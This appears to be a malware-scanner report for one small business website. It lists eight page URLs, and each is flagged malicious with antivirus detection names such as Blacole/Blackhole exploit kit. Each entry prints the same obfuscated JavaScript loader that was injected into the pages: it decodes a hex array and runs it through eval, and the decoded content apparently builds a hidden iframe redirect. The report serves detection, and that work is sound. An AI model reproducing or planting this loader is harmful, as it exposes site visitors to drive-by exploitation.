Request | Server response | Status |
http://greenrockservices.com/ | 200 OK Content-Length: 11613 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function goexfe(){zee=function(){--(fkce.body)}()}dnym="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)idbzy=4;vfa=("30,76,85,7e,73,84,79,7f,7e,30,83,72,7d,7e,81,40,49,38,39,30,8b,1d,1a,30,86,71,82,30,83,84,71,84,79,73,4d,37,71,7a,71,88,37,4b,1d,1a,30,86,71,82,30,73,7f,7e,84,82,7f,7c,7c,75,82,4d,37,79,7e,74,75,88,3e,80,78,80,37,4b,1d,1a,30,86,71,82,30,83,72,7d,7e,81,30,4d,30,74,7f,73,85,7d,75,7e,84,3e,73,82,75,71,84,75,55,7c,75,7d,75,7e,84,38,37,79,76,82,71,7d,75,37,39,4b,1d,1a,1d,1a,30,
... 3657 bytes are skipped ...38,37,86,79,83,79,84,75,74,6f,85,81,37,39,4d,4d,45,45,39,8b,8d,75,7c,83,75,8b,63,75,84,53,7f,7f,7b,79,75,38,37,86,79,83,79,84,75,74,6f,85,81,37,3c,30,37,45,45,37,3c,30,37,41,37,3c,30,37,3f,37,39,4b,1d,1a,1d,1a,83,72,7d,7e,81,40,49,38,39,4b,1d,1a,8d,1d,1a,8d".split(","));wlon=window["asdeval".substr(3)];fkce=window.document;for(avwgn=0;avwgn<vfa["le"+"ngth"];avwgn+=1){vfa[avwgn]=-(16)+parseInt(vfa[avwgn],idbzy*4);}try{goexfe()}catch(ekd){gqe=50-50;}if(!gqe)wlon(String[dnym].apply(String,vfa));Antivirus reports:- Avast
- JS:Decode-BMN [Trj]
- Bkav
- MW.Clod56d.Trojan.2ec6
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- TrojWare.JS.Kryptik.aga
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.APC!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.JS.Blacole.Z
- AVG
- JS/Exploit
- Norman
- Blacole.XQ
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.APA
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://greenrockservices.com/user.js | 200 OK Content-Length: 4798 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function goexfe(){zee=function(){--(fkce.body)}()}dnym="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)idbzy=4;vfa=("30,76,85,7e,73,84,79,7f,7e,30,83,72,7d,7e,81,40,49,38,39,30,8b,1d,1a,30,86,71,82,30,83,84,71,84,79,73,4d,37,71,7a,71,88,37,4b,1d,1a,30,86,71,82,30,73,7f,7e,84,82,7f,7c,7c,75,82,4d,37,79,7e,74,75,88,3e,80,78,80,37,4b,1d,1a,30,86,71,82,30,83,72,7d,7e,81,30,4d,30,74,7f,73,85,7d,75,7e,84,3e,73,82,75,71,84,75,55,7c,75,7d,75,7e,84,38,37,79,76,82,71,7d,75,37,39,4b,1d,1a,1d,1a,30,
... 3657 bytes are skipped ...38,37,86,79,83,79,84,75,74,6f,85,81,37,39,4d,4d,45,45,39,8b,8d,75,7c,83,75,8b,63,75,84,53,7f,7f,7b,79,75,38,37,86,79,83,79,84,75,74,6f,85,81,37,3c,30,37,45,45,37,3c,30,37,41,37,3c,30,37,3f,37,39,4b,1d,1a,1d,1a,83,72,7d,7e,81,40,49,38,39,4b,1d,1a,8d,1d,1a,8d".split(","));wlon=window["asdeval".substr(3)];fkce=window.document;for(avwgn=0;avwgn<vfa["le"+"ngth"];avwgn+=1){vfa[avwgn]=-(16)+parseInt(vfa[avwgn],idbzy*4);}try{goexfe()}catch(ekd){gqe=50-50;}if(!gqe)wlon(String[dnym].apply(String,vfa));Antivirus reports:- Avast
- JS:Decode-BMN [Trj]
- Bkav
- MW.Clod56d.Trojan.2ec6
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- TrojWare.JS.Kryptik.aga
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.APC!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.JS.Blacole.Z
- AVG
- JS/Exploit
- Norman
- Blacole.XQ
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.APA
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://greenrockservices.com/index.html | 200 OK Content-Length: 11613 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function goexfe(){zee=function(){--(fkce.body)}()}dnym="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)idbzy=4;vfa=("30,76,85,7e,73,84,79,7f,7e,30,83,72,7d,7e,81,40,49,38,39,30,8b,1d,1a,30,86,71,82,30,83,84,71,84,79,73,4d,37,71,7a,71,88,37,4b,1d,1a,30,86,71,82,30,73,7f,7e,84,82,7f,7c,7c,75,82,4d,37,79,7e,74,75,88,3e,80,78,80,37,4b,1d,1a,30,86,71,82,30,83,72,7d,7e,81,30,4d,30,74,7f,73,85,7d,75,7e,84,3e,73,82,75,71,84,75,55,7c,75,7d,75,7e,84,38,37,79,76,82,71,7d,75,37,39,4b,1d,1a,1d,1a,30,
... 3657 bytes are skipped ...38,37,86,79,83,79,84,75,74,6f,85,81,37,39,4d,4d,45,45,39,8b,8d,75,7c,83,75,8b,63,75,84,53,7f,7f,7b,79,75,38,37,86,79,83,79,84,75,74,6f,85,81,37,3c,30,37,45,45,37,3c,30,37,41,37,3c,30,37,3f,37,39,4b,1d,1a,1d,1a,83,72,7d,7e,81,40,49,38,39,4b,1d,1a,8d,1d,1a,8d".split(","));wlon=window["asdeval".substr(3)];fkce=window.document;for(avwgn=0;avwgn<vfa["le"+"ngth"];avwgn+=1){vfa[avwgn]=-(16)+parseInt(vfa[avwgn],idbzy*4);}try{goexfe()}catch(ekd){gqe=50-50;}if(!gqe)wlon(String[dnym].apply(String,vfa));Antivirus reports:- Avast
- JS:Decode-BMN [Trj]
- Bkav
- MW.Clod56d.Trojan.2ec6
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- TrojWare.JS.Kryptik.aga
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.APC!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.JS.Blacole.Z
- AVG
- JS/Exploit
- Norman
- Blacole.XQ
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.APA
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://greenrockservices.com/New_Customers.html | 200 OK Content-Length: 12821 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function goexfe(){zee=function(){--(fkce.body)}()}dnym="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)idbzy=4;vfa=("30,76,85,7e,73,84,79,7f,7e,30,83,72,7d,7e,81,40,49,38,39,30,8b,1d,1a,30,86,71,82,30,83,84,71,84,79,73,4d,37,71,7a,71,88,37,4b,1d,1a,30,86,71,82,30,73,7f,7e,84,82,7f,7c,7c,75,82,4d,37,79,7e,74,75,88,3e,80,78,80,37,4b,1d,1a,30,86,71,82,30,83,72,7d,7e,81,30,4d,30,74,7f,73,85,7d,75,7e,84,3e,73,82,75,71,84,75,55,7c,75,7d,75,7e,84,38,37,79,76,82,71,7d,75,37,39,4b,1d,1a,1d,1a,30,
... 3657 bytes are skipped ...38,37,86,79,83,79,84,75,74,6f,85,81,37,39,4d,4d,45,45,39,8b,8d,75,7c,83,75,8b,63,75,84,53,7f,7f,7b,79,75,38,37,86,79,83,79,84,75,74,6f,85,81,37,3c,30,37,45,45,37,3c,30,37,41,37,3c,30,37,3f,37,39,4b,1d,1a,1d,1a,83,72,7d,7e,81,40,49,38,39,4b,1d,1a,8d,1d,1a,8d".split(","));wlon=window["asdeval".substr(3)];fkce=window.document;for(avwgn=0;avwgn<vfa["le"+"ngth"];avwgn+=1){vfa[avwgn]=-(16)+parseInt(vfa[avwgn],idbzy*4);}try{goexfe()}catch(ekd){gqe=50-50;}if(!gqe)wlon(String[dnym].apply(String,vfa));Antivirus reports:- Avast
- JS:Decode-BMN [Trj]
- Bkav
- MW.Clod56d.Trojan.2ec6
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- TrojWare.JS.Kryptik.aga
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.APC!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.JS.Blacole.Z
- AVG
- JS/Exploit
- Norman
- Blacole.XQ
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.APA
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://greenrockservices.com/About_Us.html | 200 OK Content-Length: 12979 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function goexfe(){zee=function(){--(fkce.body)}()}dnym="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)idbzy=4;vfa=("30,76,85,7e,73,84,79,7f,7e,30,83,72,7d,7e,81,40,49,38,39,30,8b,1d,1a,30,86,71,82,30,83,84,71,84,79,73,4d,37,71,7a,71,88,37,4b,1d,1a,30,86,71,82,30,73,7f,7e,84,82,7f,7c,7c,75,82,4d,37,79,7e,74,75,88,3e,80,78,80,37,4b,1d,1a,30,86,71,82,30,83,72,7d,7e,81,30,4d,30,74,7f,73,85,7d,75,7e,84,3e,73,82,75,71,84,75,55,7c,75,7d,75,7e,84,38,37,79,76,82,71,7d,75,37,39,4b,1d,1a,1d,1a,30,
... 3657 bytes are skipped ...38,37,86,79,83,79,84,75,74,6f,85,81,37,39,4d,4d,45,45,39,8b,8d,75,7c,83,75,8b,63,75,84,53,7f,7f,7b,79,75,38,37,86,79,83,79,84,75,74,6f,85,81,37,3c,30,37,45,45,37,3c,30,37,41,37,3c,30,37,3f,37,39,4b,1d,1a,1d,1a,83,72,7d,7e,81,40,49,38,39,4b,1d,1a,8d,1d,1a,8d".split(","));wlon=window["asdeval".substr(3)];fkce=window.document;for(avwgn=0;avwgn<vfa["le"+"ngth"];avwgn+=1){vfa[avwgn]=-(16)+parseInt(vfa[avwgn],idbzy*4);}try{goexfe()}catch(ekd){gqe=50-50;}if(!gqe)wlon(String[dnym].apply(String,vfa));Antivirus reports:- Avast
- JS:Decode-BMN [Trj]
- Bkav
- MW.Clod56d.Trojan.2ec6
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- TrojWare.JS.Kryptik.aga
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.APC!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.JS.Blacole.Z
- AVG
- JS/Exploit
- Norman
- Blacole.XQ
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.APA
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://greenrockservices.com/Services.html | 200 OK Content-Length: 13194 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function goexfe(){zee=function(){--(fkce.body)}()}dnym="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)idbzy=4;vfa=("30,76,85,7e,73,84,79,7f,7e,30,83,72,7d,7e,81,40,49,38,39,30,8b,1d,1a,30,86,71,82,30,83,84,71,84,79,73,4d,37,71,7a,71,88,37,4b,1d,1a,30,86,71,82,30,73,7f,7e,84,82,7f,7c,7c,75,82,4d,37,79,7e,74,75,88,3e,80,78,80,37,4b,1d,1a,30,86,71,82,30,83,72,7d,7e,81,30,4d,30,74,7f,73,85,7d,75,7e,84,3e,73,82,75,71,84,75,55,7c,75,7d,75,7e,84,38,37,79,76,82,71,7d,75,37,39,4b,1d,1a,1d,1a,30,
... 3657 bytes are skipped ...38,37,86,79,83,79,84,75,74,6f,85,81,37,39,4d,4d,45,45,39,8b,8d,75,7c,83,75,8b,63,75,84,53,7f,7f,7b,79,75,38,37,86,79,83,79,84,75,74,6f,85,81,37,3c,30,37,45,45,37,3c,30,37,41,37,3c,30,37,3f,37,39,4b,1d,1a,1d,1a,83,72,7d,7e,81,40,49,38,39,4b,1d,1a,8d,1d,1a,8d".split(","));wlon=window["asdeval".substr(3)];fkce=window.document;for(avwgn=0;avwgn<vfa["le"+"ngth"];avwgn+=1){vfa[avwgn]=-(16)+parseInt(vfa[avwgn],idbzy*4);}try{goexfe()}catch(ekd){gqe=50-50;}if(!gqe)wlon(String[dnym].apply(String,vfa));Antivirus reports:- Avast
- JS:Decode-BMN [Trj]
- Bkav
- MW.Clod56d.Trojan.2ec6
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- TrojWare.JS.Kryptik.aga
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.APC!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.JS.Blacole.Z
- AVG
- JS/Exploit
- Norman
- Blacole.XQ
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.APA
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://greenrockservices.com/Contact_Us.html | 200 OK Content-Length: 11487 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function goexfe(){zee=function(){--(fkce.body)}()}dnym="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)idbzy=4;vfa=("30,76,85,7e,73,84,79,7f,7e,30,83,72,7d,7e,81,40,49,38,39,30,8b,1d,1a,30,86,71,82,30,83,84,71,84,79,73,4d,37,71,7a,71,88,37,4b,1d,1a,30,86,71,82,30,73,7f,7e,84,82,7f,7c,7c,75,82,4d,37,79,7e,74,75,88,3e,80,78,80,37,4b,1d,1a,30,86,71,82,30,83,72,7d,7e,81,30,4d,30,74,7f,73,85,7d,75,7e,84,3e,73,82,75,71,84,75,55,7c,75,7d,75,7e,84,38,37,79,76,82,71,7d,75,37,39,4b,1d,1a,1d,1a,30,
... 3657 bytes are skipped ...38,37,86,79,83,79,84,75,74,6f,85,81,37,39,4d,4d,45,45,39,8b,8d,75,7c,83,75,8b,63,75,84,53,7f,7f,7b,79,75,38,37,86,79,83,79,84,75,74,6f,85,81,37,3c,30,37,45,45,37,3c,30,37,41,37,3c,30,37,3f,37,39,4b,1d,1a,1d,1a,83,72,7d,7e,81,40,49,38,39,4b,1d,1a,8d,1d,1a,8d".split(","));wlon=window["asdeval".substr(3)];fkce=window.document;for(avwgn=0;avwgn<vfa["le"+"ngth"];avwgn+=1){vfa[avwgn]=-(16)+parseInt(vfa[avwgn],idbzy*4);}try{goexfe()}catch(ekd){gqe=50-50;}if(!gqe)wlon(String[dnym].apply(String,vfa));Antivirus reports:- Avast
- JS:Decode-BMN [Trj]
- Bkav
- MW.Clod56d.Trojan.2ec6
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- TrojWare.JS.Kryptik.aga
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.APC!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.JS.Blacole.Z
- AVG
- JS/Exploit
- Norman
- Blacole.XQ
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.APA
- BitDefender
- JS:Exploit.JS.Blacole.Z
|
http://greenrockservices.com/test404page.js | 404 Not Found Content-Length: 7437 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function goexfe(){zee=function(){--(fkce.body)}()}dnym="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)idbzy=4;vfa=("30,76,85,7e,73,84,79,7f,7e,30,83,72,7d,7e,81,40,49,38,39,30,8b,1d,1a,30,86,71,82,30,83,84,71,84,79,73,4d,37,71,7a,71,88,37,4b,1d,1a,30,86,71,82,30,73,7f,7e,84,82,7f,7c,7c,75,82,4d,37,79,7e,74,75,88,3e,80,78,80,37,4b,1d,1a,30,86,71,82,30,83,72,7d,7e,81,30,4d,30,74,7f,73,85,7d,75,7e,84,3e,73,82,75,71,84,75,55,7c,75,7d,75,7e,84,38,37,79,76,82,71,7d,75,37,39,4b,1d,1a,1d,1a,30,
... 3657 bytes are skipped ...38,37,86,79,83,79,84,75,74,6f,85,81,37,39,4d,4d,45,45,39,8b,8d,75,7c,83,75,8b,63,75,84,53,7f,7f,7b,79,75,38,37,86,79,83,79,84,75,74,6f,85,81,37,3c,30,37,45,45,37,3c,30,37,41,37,3c,30,37,3f,37,39,4b,1d,1a,1d,1a,83,72,7d,7e,81,40,49,38,39,4b,1d,1a,8d,1d,1a,8d".split(","));wlon=window["asdeval".substr(3)];fkce=window.document;for(avwgn=0;avwgn<vfa["le"+"ngth"];avwgn+=1){vfa[avwgn]=-(16)+parseInt(vfa[avwgn],idbzy*4);}try{goexfe()}catch(ekd){gqe=50-50;}if(!gqe)wlon(String[dnym].apply(String,vfa));Antivirus reports:- Avast
- JS:Decode-BMN [Trj]
- Bkav
- MW.Clod56d.Trojan.2ec6
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.JS.Blacole.Z
- TrendMicro-HouseCall
- TROJ_GEN.F47V1028
- Comodo
- TrojWare.JS.Kryptik.aga
- Emsisoft
- JS:Exploit.JS.Blacole.Z (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.Z
- Fortinet
- JS/Kryptik.APC!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.JS.Blacole.Z
- AVG
- JS/Exploit
- Norman
- Blacole.XQ
- GData
- JS:Exploit.JS.Blacole.Z
- ESET-NOD32
- JS/Kryptik.APA
- BitDefender
- JS:Exploit.JS.Blacole.Z
|